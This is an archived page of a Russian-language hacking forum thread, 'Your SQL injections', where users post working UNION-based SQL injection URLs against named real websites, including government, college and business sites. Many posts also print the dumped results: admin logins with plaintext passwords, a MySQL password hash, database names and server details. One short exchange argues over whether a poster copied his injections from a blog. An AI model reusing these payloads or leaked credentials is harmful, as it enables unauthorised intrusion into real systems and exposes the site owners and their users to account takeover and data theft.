Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

RE: Ваши Sql-инъекции

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции
Имя
Сообщение << Старые топики   Новые топики >>
RE: Ваши Sql-инъекции - 2010-07-12 12:10:00.623333   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
http://obec.org.ru/author.php?Id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
Post #: 361
RE: Ваши Sql-инъекции - 2010-07-14 09:09:00.323333   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
gunusa, как раскрутишь скулю, не зная версии и БД?
Post #: 362
RE: Ваши Sql-инъекции - 2010-07-14 12:21:08.280000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
quote:

ORIGINAL: gunusa

Я сказал чтоб он до конца раскручивал скулю ,а не только писал concat_ws(0x3a3a3a,user(),database(),version()).

Это не обязательно делать. Посмотри пример скули (первый пост), который можно постить, и сам даш себе ответ
Post #: 363
RE: Ваши Sql-инъекции - 2010-07-15 21:45:11.296666   
Centr1n0.1nSiDe

Сообщений: 18
Оценки: 0
Присоединился: 2010-07-15 17:07:21.620000
http://www.roda.hr/apeli.php?ID=-4+union+select+1,concat_ws%280x0b,username,0x3a,password,0x3a,admin_priv%29+from+roda_survey_users+limit+0,1+--+ http://www.roda.hr/apeli.php?ID=-4+union+select+1,concat_ws%280x0b,username,0x3a,password,0x3a,admin_priv%29+from+roda_survey_users+limit+1,1+--+
username:admin
password:password


username:roda
password:BsB6dHD
Post #: 364
RE: Ваши Sql-инъекции - 2010-07-15 22:15:31.143333   
Centr1n0.1nSiDe

Сообщений: 18
Оценки: 0
Присоединился: 2010-07-15 17:07:21.620000
http://www.zdravlje.hr/clanak.php?id=-12826+union+select+group_concat%28table_name+separator+0x3a%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x6872766174313831+--+ http://www.zdravlje.hr/clanak.php?id=-12826+union+select+group_concat%28column_name+separator+0x3a%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x61646d696e+--+ http://www.zdravlje.hr/clanak.php?id=-12826+union+select+group_concat%28concat_ws%280x0b,rbr,0x3a,rbr_klub%29%29,2,3,4,5,6,7,8,9,10,11,12,13+from+admin+limit+0,20+--+
Post #: 365
RE: Ваши Sql-инъекции - 2010-07-16 12:42:43.070000   
aces007

Сообщений: 60
Оценки: 0
Присоединился: 2010-07-15 23:40:58.040000
http://www.zdravljeizprirode.hr/proizvod.php?id=-14+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4+from+information_schema.tables+where+table_schema=0x7a647261767072695f7a6970+--+ http://www.zdravljeizprirode.hr/proizvod.php?id=-14+union+select+1,2,group_concat%28column_name+separator+0x3a%29,4+from+information_schema.columns+where+table_name=0x706f6c6c5f75736572+--+ http://www.zdravljeizprirode.hr/proizvod.php?id=-14+union+select+1,2,group_concat%28column_name+separator+0x3a%29,4+from+information_schema.columns+where+table_name=0x706f6c6c5f75736572+--+
Post #: 366
RE: Ваши Sql-инъекции - 2010-07-16 17:05:47.050000   
aces007

Сообщений: 60
Оценки: 0
Присоединился: 2010-07-15 23:40:58.040000
del
Post #: 367
RE: Ваши Sql-инъекции - 2010-07-16 17:08:58.933333   
aces007

Сообщений: 60
Оценки: 0
Присоединился: 2010-07-15 23:40:58.040000
http://www.zrsosijek.hr/izbornik.php?id=-7+UNION+SELECT+1,2,group_concat%28table_name+separator+0x3a%29,4+from+information_schema.tables+where+table_schema=0x7a72736f735f7a72736f+--+
Post #: 368
RE: Ваши Sql-инъекции - 2010-07-20 00:31:57.996666   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
Кто поможет раскурить? Буду признателен http://www.tarjaturunen.com/detalles_en.php
Post #: 369
RE: Ваши Sql-инъекции - 2010-07-20 01:17:03.483333   
Vlados777

Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
http://www.tarjaturunen.com/news_sp.php?IdRubro=-38+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables-- sepo лови
Post #: 370
RE: Ваши Sql-инъекции - 2010-07-20 02:42:33.030000   
Vlados777

Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
http://web-gamer.ru/comments.php?id=-224+union+select+1,2,concat(user(),0x2a,database(),0x2a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16 User: va91_webg@217.112.35.43
Database: va91_webg
Version: 5.0.51a-log
Post #: 371
RE: Ваши Sql-инъекции - 2010-07-21 00:56:29.053333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.fctz.ru/inner.php?action=section&idsec=1&idssec=13+and+sleep%283%29%23 вроде бы слепая скуля… толком не сморел… кто посмотрит отпишитесь…
Post #: 372
RE: Ваши Sql-инъекции - 2010-07-22 10:32:30.973333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://jeremynoa.com/site/web.php?id=-2+union+select+0,1,2,3,concat(username,0x3a,password),5,6+from+users https://pingat.kwp.gov.my/galeriGambarView.php?&rs=next&rs_per_page=20&id=1%20and%201=2%20UNION%20SELECT%201,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12%20from%20pengguna-- http://www.dataposit.co.ke/news.php?ID=-1+union+select+0,group_concat%28username,0x3a,password%29,2,3+from+login-- http://nekar.gr/index.php?id=-1%20union%20select%200,concat(username,0x3a,password,0x3a,email),2,0x65786569207369676f75726120736f6261726f2070726f626c686d6120682053514c20746f75207369746521,4,5,6,7,8,9,10,11%20from%20admins-- http://goldsgym.co.id/news_detail.php?id=51+and+1=2+union+select+1,group_concat(Username,0x3a,Password)++from+users http://puspen.depdagri.go.id/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users-- http://stabmaitreyawira.ac.id/news_detail.php?id=-2+union+select+1,2,3,4,group_concat(username,0x3a,password),6+from+user--
Post #: 373
RE: Ваши Sql-инъекции - 2010-07-22 13:31:03.766666   
Vlados777

Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
http://www.amigo-tours.ru/czechia_ru/firms/index.html?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x2a,database(),0x2a,version()),15,16,17 User: amigo-tours@zvm14.host.ru
Database: amigo-tours
Version: 4.0.27-log
Post #: 374
RE: Ваши Sql-инъекции - 2010-07-22 16:26:49.886666   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.bhutan.gov.bt/government/newsDetail.php?id=-1495+union+select+1,2,group_concat(ID,0x3a,USERNAME,0x3a,PASSW,0x3a,FNAME,0x3a,MNAME,0x3a,LNAME,0x3a,EMAIL,0x3a,AGENCY,0x3a,STATUS,0x3a,ROLEID),4,5,6,7,8+from+users-- http://www.kitefestpasirgudang.com/Content.php?id=-2+union+select+group_concat(member_id,0x3a,member_login,0x3a,member_password),2,3,4+from+members--
Post #: 375
RE: Ваши Sql-инъекции - 2010-07-23 20:46:34.980000   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
Sepo
Тема называется ваши Sql-инъекции
А скули то оказывается не твои))) А именно твой приведущий пост где ты выложил 7 скулей
http://my-bhie.blogspot.com/2010/06/kumpulan-site-bug-sqli-by-me.html
Случайно набрел…
Post #: 376
RE: Ваши Sql-инъекции - 2010-07-24 22:36:05.430000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: GaMeSTeR001

Sepo
Тема называется ваши Sql-инъекции
А скули то оказывается не твои))) А именно твой приведущий пост где ты выложил 7 скулей
http://my-bhie.blogspot.com/2010/06/kumpulan-site-bug-sqli-by-me.html
Случайно набрел…


Посмотрел ссылку которую ты запостил говоря что я скопипстил скули с других ресурсов… интересный
блог… Но! разве я виноват что гугл один, сайт уязвим для всех одинаково и не только я натыкаюсь на уязвимые ссылки? Пойми, нельзя проверить каждую ссыль очень чательно… я человек а не машина… если кто-то считает что я их скопипастил, удалите мой пост… заминусуйте меня… заодно и всех тех кто вообще что-то пишет на этом сайте… Но знай что копипастом я не занимаюсь! Какой смысл??? Я что за это деньги получаю??? Нет… Так что?
Post #: 377
RE: Ваши Sql-инъекции - 2010-07-25 00:12:48.706666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.dawnprog.com/about.php?id=-2+union+select+1,2,3,SQL,5--
user:dawn_guest@82.195.232.140
basedir:/usr/
datadir:/var/lib/mysql/
tmpdir:/tmp/
os:redhat-linux-gnu
base:dawn
ver:5.0.45-log

Post #: 378
RE: Ваши Sql-инъекции - 2010-07-25 01:11:59.946666   
fasfas

Сообщений: 152
Оценки: 0
Присоединился: 2010-06-06 14:21:15.500000
http://think.maxwellrender.com/video.php?id=-56+union+select+1,group_concat(login,0x2a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+administrador
Login: eladnts Pass: eladnts
Login: nextlimit Pass: cocoliso
Login: adminmaterials Pass: cocoliso
Login: prueba Pass: prueba
Login: rfresources Pass: cocoliso
Post #: 379
RE: Ваши Sql-инъекции - 2010-07-25 08:52:23.783333   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
Sepo
Просто очень похоже на копипаст, я понимаю если бы 1 совпадение или 2,3 а у тебя весь пост совпадает))
Post #: 380
RE: Ваши Sql-инъекции - 2010-07-25 18:36:57.440000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.mabrinaproperties.co.za/read.php?id=-1+union+select+1,SQL,3,4,5--
Post #: 381
RE: Ваши Sql-инъекции - 2010-07-25 19:37:46.320000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://helmsmanmobile.com/stories/read.php?id=1&amp;post_id=-23+union+select+1,2,SQL,4,5,6,7,8,9,10,11--
base:ici_v1
user:ken@localhost
basedir:/usr/
datadir:/var/lib/mysql/
tmpdir:/tmp/
os:redhat-linux-gnu
mysql.user:ken
mysql.password:32e4874f1adb805a
ver:5.0.45

Post #: 382
RE: Ваши Sql-инъекции - 2010-07-25 19:42:29.336666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.caravantrekker.nl/vragen/read.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
Post #: 383
RE: Ваши Sql-инъекции - 2010-07-25 19:53:18.246666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.krlmania.com/sinyal/read.php?id=-1+union+select+1,2,SQL,4,5,6,7,8,9,10-- —————————————–
HOST: www.krlmania.com
—————————————–
System information:
—————————————–
user:krlmania_krl@localhost
basedir:/
datadir:/var/lib/mysql/
tmpdir:/tmp/
os:pc-linux-gnu
ver:5.0.90-community
base:krlmania_redaktur
Post #: 384
RE: Ваши Sql-инъекции - 2010-07-25 22:20:01.463333   
brandon

Сообщений: 334
Оценки: 0
Присоединился: 2010-02-14 11:09:02.680000
prasuyoga.com.ua/index.php?id=99999+union+select+1,2,3,concat_ws(0x3a,id_user,username_user,password_user)+from+users_tab+limit+0,1–
Post #: 385
RE: Ваши Sql-инъекции - 2010-07-25 22:43:18.563333   
brandon

Сообщений: 334
Оценки: 0
Присоединился: 2010-02-14 11:09:02.680000
http://www.homeidei.ru/index.php?link=3&amp;id=-20+union+select+concat(login,0x3a,pass),2,3+from+ost--
admin1:asdf7002

Post #: 386
RE: Ваши Sql-инъекции - 2010-07-26 17:33:46.473333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://rie.cl/x.php?id=-9+union+select+1,SQL,3,4,5--
base:base2
user:us3r2@10.1.1.44
basedir:/usr/
datadir:/var/lib/mysql/
ver:5.0.45

Post #: 387
RE: Ваши Sql-инъекции - 2010-07-26 17:38:14.753333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.casep.org.ve/x.php?id=-12+union+select+1,concat%28version%28%29,database%28%29,user%28%29%29,3,4,5,6--
Post #: 388
RE: Ваши Sql-инъекции - 2010-07-26 17:44:42.413333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.tollab.se/x.php?id=-30+union+select+1,2,SQL,4--
basedir:/usr/
datadir:/var/lib/mysql/
tmpdir:/tmp
user:tollab_se@srv139.one.com
os:debian-linux-gnu
ver:5.0.51a-24+lenny3-log
base:tollab_se

Post #: 389
RE: Ваши Sql-инъекции - 2010-07-27 16:19:48.513333   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
http://catalog.tabu.kz/rating.php?group_id=61+union+select+1,2,group_concat(email,0x3a,pass,0x0b)+from+cat_users--+
Post #: 390
RE: Ваши Sql-инъекции - 2010-07-27 16:54:57.246666   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
http://www.locman.kz/lekarstvo.php?ID=-6919+union+select+1,2,3,4,5,group_concat(table_name+separator+0x0b),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x762d313633375f6c6f636d616e5f677a--+
Post #: 391
RE: Ваши Sql-инъекции - 2010-07-28 12:32:26.916666   
Olex.Black

Сообщений: 3
Оценки: 0
Присоединился: 2010-07-25 19:00:49.100000
УГ/АМ
Post #: 392
RE: Ваши Sql-инъекции - 2010-07-28 12:37:10.413333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.mandaptravels.com/voyager-avec-mandap-travel.php?id=-1+union+select+1,SQL,3,4,5,6,7--
base:db268471740
user:dbo268471740@212.227.119.58
basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/
datadir:/db/mysql/
tmpdir:/var/tmp
ver:5.0.81-log
os:pc-linux-gnu

Post #: 393
RE: Ваши Sql-инъекции - 2010-07-28 20:27:56.536666   
brandon

Сообщений: 334
Оценки: 0
Присоединился: 2010-02-14 11:09:02.680000
http://www.edwardparkerwines.co.uk/offers.php?id=-111+union+all+select+1,version(),group_concat(username,0x3a,password),4,5+from+usertable--
Post #: 394
RE: Ваши Sql-инъекции - 2010-07-29 14:26:27.303333   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
http://www.nevod.net.ua/service.php?id=6+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--+ Version: 4.0.27-standard-log
User: olgaarg_nevodarg@localhost
Database: olgaarg_nevod
Post #: 395
RE: Ваши Sql-инъекции - 2010-07-31 18:33:02.896666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.cetonline.org/Events/events.php?id=-1+UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--
Post #: 396
RE: Ваши Sql-инъекции - 2010-07-31 18:36:56.386666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.lewiscountyuw.com/events.php?ID=-1+UNION SELECT 1,2,3,4,5,6,7,8,9,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),11,12,13--
Post #: 397
RE: Ваши Sql-инъекции - 2010-07-31 23:37:22.230000   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
http://artmaxima.ua/service.php?id=157+and+1=2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--+ Version: 5.0.91-community
User: artmaxim_artmax@localhost
Database: artmaxim_test
Post #: 398
RE: Ваши Sql-инъекции - 2010-08-03 19:20:38.523333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.lagunacollege.edu/news.php?id=-4+union+all+select+1,2,group_concat%28ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email%29,4,concat_ws%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,6,7%20from+wp_users+limit%200,1--
Post #: 399
RE: Ваши Sql-инъекции - 2010-08-03 19:36:48.413333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.agenziaformula.it/news.php?id=-4+union+select+1,2,3,version%28%29–
Post #: 400
Страниц:  1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17
Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.